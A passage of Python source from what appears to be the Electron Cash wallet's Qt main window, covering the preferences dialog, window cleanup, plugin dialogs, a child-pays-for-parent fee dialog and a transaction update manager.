cr_grid.addWidget(cr_help, 0, 2, 1, 1, Qt.AlignLeft)
cr_grid.addWidget(QWidget(), 0, 3, 1, 1) # dummy spacer
cr_grid.setColumnStretch(0, 1)
cr_grid.setColumnStretch(3, 1)
# Crash reporter box at bottom of this tab
misc_widgets.append((cr_gb, None)) # commit crash reporter gb to layout
units = util.base_unit_labels # ( 'BCH', 'mBCH', 'bits' )
msg = _('Base unit of your wallet.')\
+ '\n1 BCH = 1,000 mBCH = 1,000,000 bits.\n' \
+ _(' These settings affects the fields in the Send tab')+' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
dp = util.base_units.get(unit_result)
if dp is not None:
self.decimal_point = dp
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_tabs()
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = web.BE_sorted_list()
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online block explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(web.BE_from_config(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
qr_combo = QComboBox()
qr_label = HelpLabel(_('Video device'), '')
qr_did_scan = False
def set_no_camera(e=''):
# Older Qt or missing libs -- disable GUI control and inform user why
qr_combo.setEnabled(False)
qr_combo.clear()
qr_combo.addItem(_("Default"), "default")
qr_combo.setToolTip(_("Unable to probe for cameras on this system. QtMultimedia is likely missing."))
qr_label.setText(_('Video device') + ' ' + _('(disabled)') + ':')
qr_label.help_text = qr_combo.toolTip() + "\n\n" + str(e)
qr_label.setToolTip(qr_combo.toolTip())
def scan_cameras():
nonlocal qr_did_scan
if qr_did_scan or dialog_finished: # dialog_finished guard needed because QueuedConnection
# already scanned or dialog finished quickly
return
qr_did_scan = True
system_cameras = []
try:
from PyQt5.QtMultimedia import QCameraInfo
except ImportError as e:
set_no_camera(e)
return
system_cameras = QCameraInfo.availableCameras()
qr_combo.clear()
qr_combo.addItem(_("Default"), "default")
qr_label.setText(_('Video device') + ':')
qr_label.help_text = _("For scanning QR codes.")
qr_combo.setToolTip(qr_label.help_text)
qr_label.setToolTip(qr_label.help_text)
for cam in system_cameras:
qr_combo.addItem(cam.description(), cam.deviceName())
video_device = self.config.get("video_device")
video_device_index = 0
if video_device:
video_device_index = max(0, qr_combo.findData(video_device)) # if not found, default to 0 (the default item)
qr_combo.setCurrentIndex(video_device_index)
qr_combo.setEnabled(True)
def on_video_device(x):
if qr_combo.isEnabled():
self.config.set_key("video_device", qr_combo.itemData(x), True)
set_no_camera() # pre-populate combo box with default so it has a sizeHint
d.shown_signal.connect(scan_cameras, Qt.QueuedConnection) # do the camera scan once dialog is shown, using QueuedConnection so it's called from top level event loop and not from the showEvent handler
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Default'), 'default') # We can't name this "light" in the UI as sometimes the default is actually dark-looking eg on Mojave or on some Linux desktops.
colortheme_combo.addItem(_('Dark'), 'dark')
theme_name = self.config.get('qt_gui_color_theme', 'default')
dark_theme_available = self.gui_object.is_dark_theme_available()
if theme_name == 'dark' and not dark_theme_available:
theme_name = 'default'
index = colortheme_combo.findData(theme_name)
if index < 0: index = 0
colortheme_combo.setCurrentIndex(index)
msg = ( _("Dark theme support requires the package 'QDarkStyle' (typically installed via the 'pip3' command on Unix & macOS).")
if not dark_theme_available
else '' )
lbltxt = _('Color theme') + ':'
colortheme_label = HelpLabel(lbltxt, msg) if msg else QLabel(lbltxt)
def on_colortheme(x):
item_data = colortheme_combo.itemData(x)
if not dark_theme_available and item_data == 'dark':
self.show_error(_("Dark theme is not available. Please install QDarkStyle to access this feature."))
colortheme_combo.setCurrentIndex(0)
return
self.config.set_key('qt_gui_color_theme', item_data, True)
if theme_name != item_data:
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
if sys.platform not in ('darwin',):
# Enable/Disable HighDPI -- this option makes no sense for macOS
# and thus does not appear on that platform
hidpi_chk = QCheckBox(_('Automatic high-DPI scaling'))
if sys.platform in ('linux',):
hidpi_chk.setToolTip(_("Enable/disable this option if you experience graphical glitches (such as overly large status bar icons)"))
else: # windows
hidpi_chk.setToolTip(_("Enable/disable this option if you experience graphical glitches (such as dialog box text being cut off"))
hidpi_chk.setChecked(bool(self.config.get('qt_enable_highdpi', True)))
if self.config.get('qt_disable_highdpi'):
hidpi_chk.setToolTip(_('Automatic high DPI scaling was disabled from the command-line'))
hidpi_chk.setChecked(False)
hidpi_chk.setDisabled(True)
def on_hi_dpi_toggle():
self.config.set_key('qt_enable_highdpi', hidpi_chk.isChecked())
self.need_restart = True
hidpi_chk.stateChanged.connect(on_hi_dpi_toggle)
gui_widgets.append((hidpi_chk, None))
if sys.platform in ('win32', 'cygwin'):
# Enable/Disable the use of the FreeType library on Qt
# (Windows only)
freetype_chk = QCheckBox(_('Use FreeType for font rendering'))
freetype_chk.setChecked(self.gui_object.windows_qt_use_freetype)
freetype_chk.setEnabled(self.config.is_modifiable('windows_qt_use_freetype'))
freetype_chk.setToolTip(_("Enable/disable this option if you experience font rendering glitches (such as blurred text or monochrome emoji characters)"))
def on_freetype_chk():
self.gui_object.windows_qt_use_freetype = freetype_chk.isChecked() # property has a method backing it
self.need_restart = True
freetype_chk.stateChanged.connect(on_freetype_chk)
gui_widgets.append((freetype_chk, None))
elif sys.platform in ('linux',):
# Enable/Disable the use of the fonts.xml FontConfig override
# (Linux only)
fontconfig_chk = QCheckBox(_('Use custom fontconfig for emojis'))
fontconfig_chk.setChecked(self.gui_object.linux_qt_use_custom_fontconfig)
fontconfig_chk.setEnabled(self.config.is_modifiable('linux_qt_use_custom_fontconfig'))
fontconfig_chk.setToolTip(_("Enable/disable this option if you experience font rendering glitches (such as blurred text or monochrome emoji characters)"))
def on_fontconfig_chk():
self.gui_object.linux_qt_use_custom_fontconfig = fontconfig_chk.isChecked() # property has a method backing it
self.need_restart = True
fontconfig_chk.stateChanged.connect(on_fontconfig_chk)
gui_widgets.append((fontconfig_chk, None))
gui_widgets.append((None, None)) # spacer
updatecheck_cb = QCheckBox(_("Automatically check for updates"))
updatecheck_cb.setChecked(self.gui_object.has_auto_update_check())
updatecheck_cb.setToolTip(_("Enable this option if you wish to be notified as soon as a new version of Electron Cash becomes available"))
def on_set_updatecheck(v):
self.gui_object.set_auto_update_check(v == Qt.Checked)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
notify_tx_cb = QCheckBox(_('Notify when receiving funds'))
notify_tx_cb.setToolTip(_('If enabled, a system notification will be presented when you receive funds to this wallet.'))
notify_tx_cb.setChecked(bool(self.wallet.storage.get('gui_notify_tx', True)))
def on_notify_tx(b):
self.wallet.storage.put('gui_notify_tx', bool(b))
notify_tx_cb.stateChanged.connect(on_notify_tx)
per_wallet_tx_widgets.append((notify_tx_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
if self.force_use_single_change_addr:
usechange_cb.setChecked(True)
usechange_cb.setEnabled(False)
if isinstance(self.force_use_single_change_addr, str):
usechange_cb.setToolTip(self.force_use_single_change_addr)
else:
usechange_cb.setChecked(self.wallet.use_change)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
per_wallet_tx_widgets.append((usechange_cb, None))
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
if self.force_use_single_change_addr:
multiple_cb.setEnabled(False)
multiple_cb.setChecked(False)
if isinstance(self.force_use_single_change_addr, str):
multiple_cb.setToolTip(self.force_use_single_change_addr)
else:
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_cb.stateChanged.connect(on_multiple)
per_wallet_tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
global_tx_widgets.append((unconf_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
enable_opreturn = bool(self.config.get('enable_opreturn'))
opret_cb = QCheckBox(_('Enable OP_RETURN output'))
opret_cb.setToolTip(_('Enable posting messages with OP_RETURN.'))
opret_cb.setChecked(enable_opreturn)
opret_cb.stateChanged.connect(self.on_toggled_opreturn)
global_tx_widgets.append((opret_cb,None))
# Schnorr
use_schnorr_cb = QCheckBox(_("Sign with Schnorr signatures"))
use_schnorr_cb.setChecked(self.wallet.is_schnorr_enabled())
use_schnorr_cb.stateChanged.connect(self.wallet.set_schnorr_enabled)
no_schnorr_reason = []
if self.wallet.is_schnorr_possible(no_schnorr_reason):
use_schnorr_cb.setEnabled(True)
use_schnorr_cb.setToolTip(_("Sign all transactions using Schnorr signatures."))
else:
# not possible (wallet type not supported); show reason in tooltip
use_schnorr_cb.setEnabled(False)
use_schnorr_cb.setToolTip(no_schnorr_reason[0])
per_wallet_tx_widgets.append((use_schnorr_cb, None))
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([pgettext('Referencing Fiat currency', 'None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
c = self.fx.get_currency()
h = self.fx.get_history_config()
else:
c, h = self.fx.default_currency, False
exchanges = self.fx.get_exchanges_by_ccy(c, h)
conf_exchange = self.fx.config_exchange()
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
idx = ex_combo.findText(conf_exchange) # try and restore previous exchange if in new list
if idx < 0:
# hmm, previous exchange wasn't in new h= setting. Try default exchange.
idx = ex_combo.findText(self.fx.default_exchange)
idx = 0 if idx < 0 else idx # if still no success (idx < 0) -> default to the first exchange in combo
if exchanges: # don't set index if no exchanges, as any index is illegal. this shouldn't happen.
ex_combo.setCurrentIndex(idx) # note this will emit a currentIndexChanged signal if it's changed
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
changed = bool(self.fx.get_history_config()) != bool(checked)
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
self.slp_history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
if changed:
self.history_list.update() # this won't happen too often as it's rate-limited
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
hist_checkbox.setText(_('Show history rates'))
fiat_address_checkbox.setText(_('Show fiat balance for addresses'))
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency:')), ccy_combo))
fiat_widgets.append((QLabel(_('Source:')), ex_combo))
fiat_widgets.append((hist_checkbox, None))
fiat_widgets.append((fiat_address_checkbox, None))
tabs_info = [
(gui_widgets, _('General')),
(misc_widgets, pgettext("The preferences -> Fees,misc tab", 'Fees && Misc.')),
(OrderedDict([
( _("App-Global Options") , global_tx_widgets ),
( _("Per-Wallet Options") , per_wallet_tx_widgets),
]), _('Transactions')),
(fiat_widgets, _('Fiat')),
]
def add_tabs_info_to_tabs(tabs, tabs_info):
def add_widget_pair(a,b,grid):
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
if a:
grid.addWidget(a, i, 0, 1, 2)
else:
grid.addItem(QSpacerItem(15, 15), i, 0, 1, 2)
for thing, name in tabs_info:
tab = QWidget()
if isinstance(thing, dict):
# This Prefs tab is laid out as groupboxes one atop another...
d = thing
vbox = QVBoxLayout(tab)
for groupName, widgets in d.items():
gbox = QGroupBox(groupName)
grid = QGridLayout(gbox)
grid.setColumnStretch(0,1)
for a,b in widgets:
add_widget_pair(a,b,grid)
vbox.addWidget(gbox, len(widgets))
else:
# Standard layout.. 1 tab has just a grid of widgets
widgets = thing
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
add_widget_pair(a,b,grid)
tabs.addTab(tab, name)
# / add_tabs_info_to_tabs
add_tabs_info_to_tabs(tabs, tabs_info)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
try:
# run the dialog
d.exec_()
finally:
dialog_finished = True # paranoia for scan_cameras
d.setParent(None) # for Python GC
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_message(_('Please restart Electron Cash to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice.
# clean_up() guards against that situation.
self.clean_up()
super().closeEvent(event)
event.accept() # paranoia. be sure it's always accepted.
def is_alive(self): return bool(not self.cleaned_up)
def clean_up_connections(self):
def disconnect_signals():
for attr_name in dir(self):
if attr_name.endswith("_signal"):
sig = getattr(self, attr_name)
if isinstance(sig, pyqtBoundSignal):
try: sig.disconnect()
except TypeError: pass # no connections
elif attr_name.endswith("__RateLimiter"): # <--- NB: this needs to match the attribute name in util.py rate_limited decorator
rl_obj = getattr(self, attr_name)
if isinstance(rl_obj, RateLimiter):
rl_obj.kill_timer()
try: self.disconnect()
except TypeError: pass
# Work-around to PyQt bugs. See EC issue #1532
try: self.gui_object.update_available_signal.disconnect(self.on_update_available) # shows/hides the update_available_button, emitted by update check mechanism when a new version is available
except TypeError: pass
def disconnect_network_callbacks():
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
# /
disconnect_network_callbacks()
disconnect_signals()
def clean_up_children(self):
# Status bar holds references to self, so clear it to help GC this window
self.setStatusBar(None)
# Note that due to quirks on macOS and the shared menu bar, we do *NOT*
# clear the menuBar. Instead, doing this causes the object to get
# deleted and/or its actions (and more importantly menu action hotkeys)
# to go away immediately.
self.setMenuBar(None)
# Disable shortcuts immediately to prevent them from accidentally firing
# on us after we are closed. They will get deleted when this QObject
# is finally deleted by Qt.
for shortcut in self._shortcuts:
shortcut.setEnabled(False)
del shortcut
self._shortcuts.clear()
# Reparent children to 'None' so python GC can clean them up sooner rather than later.
# This also hopefully helps accelerate this window's GC.
children = [c for c in self.children()
if (isinstance(c, (QWidget, QAction, TaskThread))
and not isinstance(c, (QStatusBar, QMenuBar, QFocusFrame, QShortcut)))]
for c in children:
try: c.disconnect()
except TypeError: pass
c.setParent(None)
def clean_up(self):
if self.cleaned_up:
return
self.cleaned_up = True
if self.wallet.thread: # guard against window close before load_wallet was called (#1554)
self.wallet.thread.stop()
self.wallet.thread.wait() # Join the thread to make sure it's really dead.
if self.wallet.ui_emit_validity_updated:
self.wallet.ui_emit_validity_updated = None # detach callback
if self.wallet.ui_emit_validation_fetch:
self.wallet.ui_emit_validation_fetch = None
self.tx_update_mgr.clean_up() # disconnects some signals
# We catch these errors with the understanding that there is no recovery at
# this point, given user has likely performed an action we cannot recover
# cleanly from. So we attempt to exit as cleanly as possible.
try:
self.config.set_key("is_maximized", self.isMaximized())
self.config.set_key("console-history", self.console.history[-50:], True)
except (OSError, PermissionError) as e:
self.print_error("unable to write to config (directory removed?)", e)
if not self.isMaximized():
try:
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),g.width(),g.height()])
except (OSError, PermissionError) as e:
self.print_error("unable to write to wallet storage (directory removed?)", e)
# Should be no side-effects in this function relating to file access past this point.
if self.qr_window:
self.qr_window.close()
self.qr_window = None # force GC sooner rather than later.
for d in list(self._tx_dialogs):
# clean up all extant tx dialogs we opened as they hold references
# to us that will be invalidated
d.prompt_if_unsaved = False # make sure to unconditionally close
d.close()
for d in list(self._slp_dialogs):
d.close() # make sure dialogs we created are properly closed!
self._close_wallet()
try: self.gui_object.timer.timeout.disconnect(self.timer_actions)
except TypeError: pass # defensive programming: this can happen if we got an exception before the timer action was connected
self.gui_object.close_window(self) # implicitly runs the hook: on_close_window
# Now, actually STOP the wallet's synchronizer and verifiers and remove
# it from the daemon. Note that its addresses will still stay
# 'subscribed' to the ElectrumX server until we connect to a new server,
# (due to ElectrumX protocol limitations).. but this is harmless.
self.gui_object.daemon.stop_wallet(self.wallet.storage.path)
# At this point all plugins should have removed any references to this window.
# Now, just to be paranoid, do some active destruction of signal/slot connections as well as
# Removing child widgets forcefully to speed up Python's own GC of this window.
self.clean_up_connections()
self.clean_up_children()
# And finally, print when we are destroyed by C++ for debug purposes
# We must call this here as above calls disconnected all signals
# involving this widget.
destroyed_print_error(self)
def internal_plugins_dialog(self):
if self.internalpluginsdialog:
# NB: reentrance here is possible due to the way the window menus work on MacOS.. so guard against it
self.internalpluginsdialog.raise_()
return
d = WindowModalDialog(self.top_level_window(), _('Optional Features'))
weakD = Weak.ref(d)
gui_object = self.gui_object
plugins = gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.get_internal_plugin_count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
weakGrid = Weak.ref(grid)
w.setLayout(grid)
settings_widgets = Weak.ValueDictionary()
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
grid = weakGrid()
d = weakD()
if d and grid and not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
if not p:
# Need to delete settings widget because keeping it around causes bugs as it points to a now-dead plugin instance
settings_widgets.pop(name)
widget.hide(); widget.setParent(None); widget.deleteLater(); widget = None
def do_toggle(weakCb, name, i):
cb = weakCb()
if cb:
p = plugins.toggle_internal_plugin(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# All plugins get this whenever one is toggled.
run_hook('init_qt', gui_object)
for i, descr in enumerate(plugins.internal_plugin_metadata.values()):
name = descr['__name__']
p = plugins.get_internal_plugin(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
weakCb = Weak.ref(cb)
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_internal_plugin_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, weakCb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stderr)
grid.setRowStretch(len(plugins.internal_plugin_metadata.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
self.internalpluginsdialog = d
d.exec_()
self.internalpluginsdialog = None # Python GC please!
def external_plugins_dialog(self):
if self.externalpluginsdialog:
# NB: reentrance here is possible due to the way the window menus work on MacOS.. so guard against it
self.externalpluginsdialog.raise_()
return
from . import external_plugins_window
d = external_plugins_window.ExternalPluginsDialog(self, _('Plugin Manager'))
self.externalpluginsdialog = d
d.exec_()
self.externalpluginsdialog = None # allow python to GC
def hardware_wallet_support(self):
if not sys.platform.startswith('linux'):
self.print_error("FIXME! hardware_wallet_support is Linux only!")
return
if self.hardwarewalletdialog:
# NB: reentrance here is possible due to the way the window menus work on MacOS.. so guard against it
self.hardwarewalletdialog.raise_()
return
from .udev_installer import InstallHardwareWalletSupportDialog
d = InstallHardwareWalletSupportDialog(self.top_level_window(), self.gui_object.plugins)
self.hardwarewalletdialog = d
d.exec_()
self.hardwarewalletdialog = None # allow python to GC
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self.top_level_window(), _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel(_('{total_size} bytes').format(total_size=total_size)), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee' + ':')), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
result = d.exec_()
d.setParent(None) # So Python can GC
if not result:
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
if new_tx is None:
self.show_error(_('CPFP no longer valid'))
return
self.show_transaction(new_tx)
def rebuild_history(self):
if self.gui_object.warn_if_no_network(self):
# Don't allow if offline mode.
return
msg = ' '.join([
_('This feature is intended to allow you to rebuild a wallet if it has become corrupted.'),
"\n\n"+_('Your entire transaction history will be downloaded again from the server and verified from the blockchain.'),
_('Just to be safe, back up your wallet file first!'),
"\n\n"+_("Rebuild this wallet's history now?")
])
if self.question(msg, title=_("Rebuild Wallet History")):
try:
self.wallet.rebuild_history()
except RuntimeError as e:
self.show_error(str(e))
def scan_beyond_gap(self):
if self.gui_object.warn_if_no_network(self):
return
from .scan_beyond_gap import ScanBeyondGap
d = ScanBeyondGap(self)
d.exec_()
d.setParent(None) # help along Python by dropping refct to 0
def copy_to_clipboard(self, text, tooltip=None, widget=None):
tooltip = tooltip or _("Text copied to clipboard")
widget = widget or self
qApp.clipboard().setText(text)
QToolTip.showText(QCursor.pos(), tooltip, widget)
class TxUpdateMgr(QObject, PrintError):
''' Manages new transaction notifications and transaction verified
notifications from the network thread. It collates them and sends them to
the appropriate GUI controls in the main_window in an efficient manner. '''
def __init__(self, main_window_parent):
assert isinstance(main_window_parent, ElectrumWindow), "TxUpdateMgr must be constructed with an ElectrumWindow as its parent"
super().__init__(main_window_parent)
self.cleaned_up = False
self.lock = threading.Lock() # used to lock thread-shared attrs below
# begin thread-shared attributes
self.notif_q = []
self.verif_q = []
self.need_process_v, self.need_process_n = False, False
# /end thread-shared attributes
self.weakParent = Weak.ref(main_window_parent)
main_window_parent.history_updated_signal.connect(self.verifs_get_and_clear, Qt.DirectConnection) # immediately clear verif_q on history update because it would be redundant to keep the verify queue around after a history list update
main_window_parent.on_timer_signal.connect(self.do_check, Qt.DirectConnection) # hook into main_window's timer_actions function
self.full_hist_refresh_timer = QTimer(self)
self.full_hist_refresh_timer.setInterval(1000); self.full_hist_refresh_timer.setSingleShot(False)
self.full_hist_refresh_timer.timeout.connect(self.schedule_full_hist_refresh_maybe)
def diagnostic_name(self):
return ((self.weakParent() and self.weakParent().diagnostic_name()) or "???") + "." + __class__.__name__
def clean_up(self):
self.cleaned_up = True
main_window_parent = self.weakParent() # weak -> strong ref
if main_window_parent:
try: main_window_parent.history_updated_signal.disconnect(self.verifs_get_and_clear)
except TypeError: pass
try: main_window_parent.on_timer_signal.disconnect(self.do_check)
except TypeError: pass
def do_check(self):
''' Called from timer_actions in main_window to check if notifs or
verifs need to update the GUI.
- Checks the need_process_[v|n] flags
- If either flag is set, call the @rate_limited process_verifs
and/or process_notifs functions which update GUI parent in a
rate-limited (collated) fashion (for decent GUI responsiveness). '''
with self.lock:
bV, bN = self.need_process_v, self.need_process_n
self.need_process_v, self.need_process_n = False, False
if bV: self.process_verifs() # rate_limited call (1 per second)
if bN: self.process_notifs() # rate_limited call (1 per 15 seconds)
def verifs_get_and_clear(self):
''' Clears the verif_q. This is called from the network
thread for the 'verified2' event as well as from the below
update_verifs (GUI thread), hence the lock. '''
with self.lock:
ret = self.verif_q
self.verif_q = []
self.need_process_v = False
return ret
def notifs_get_and_clear(self):
with self.lock:
ret = self.notif_q
self.notif_q = []
self.need_process_n = False
return ret
def verif_add(self, args):
# args: [wallet, tx_hash, height, conf, timestamp]
# filter out tx's not for this wallet
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
if args[0] is parent.wallet:
with self.lock:
self.verif_q.append(args[1:])
self.need_process_v = True
def notif_add(self, args):
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
tx, wallet = args
# filter out tx's not for this wallet
if wallet is parent.wallet:
with self.lock:
self.notif_q.append(tx)
self.need_process_n = True
@rate_limited(1.0, ts_after=True)
def process_verifs(self):
''' Update history list with tx's from verifs_q, but limit the
GUI update rate to once per second. '''
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
items = self.verifs_get_and_clear()
if items:
t0 = time.time()
parent.history_list.setUpdatesEnabled(False)
parent.slp_history_list.setUpdatesEnabled(False)
had_sorting = [ parent.history_list.isSortingEnabled(),
parent.slp_history_list.isSortingEnabled() ]
if had_sorting[0]:
parent.history_list.setSortingEnabled(False)
if had_sorting[1]:
parent.slp_history_list.setSortingEnabled(False)
n_updates = 0
for item in items:
did_update = parent.history_list.update_item(*item)
parent.slp_history_list.update_item_netupdate(*item)
n_updates += 1 if did_update else 0
self.print_error("Updated {}/{} verified txs in GUI in {:0.2f} ms"
.format(n_updates, len(items), (time.time()-t0)*1e3))
if had_sorting[0]:
parent.history_list.setSortingEnabled(True)
if had_sorting[1]:
parent.slp_history_list.setSortingEnabled(True)
parent.slp_history_list.setUpdatesEnabled(True)
parent.history_list.setUpdatesEnabled(True)
parent.update_status()
if parent.history_list.has_unknown_balances:
self.print_error("History tab: 'Unknown' balances detected, will schedule a GUI refresh after wallet settles")
self._full_refresh_ctr = 0
self.full_hist_refresh_timer.start()
_full_refresh_ctr = 0
def schedule_full_hist_refresh_maybe(self):
''' self.full_hist_refresh_timer timeout slot. May schedule a full
history refresh after wallet settles if we have "Unknown" balances. '''
parent = self.weakParent()
if self._full_refresh_ctr > 60:
# Too many retries. Give up.
self.print_error("History tab: Full refresh scheduler timed out.. wallet hasn't settled in 1 minute. Giving up.")
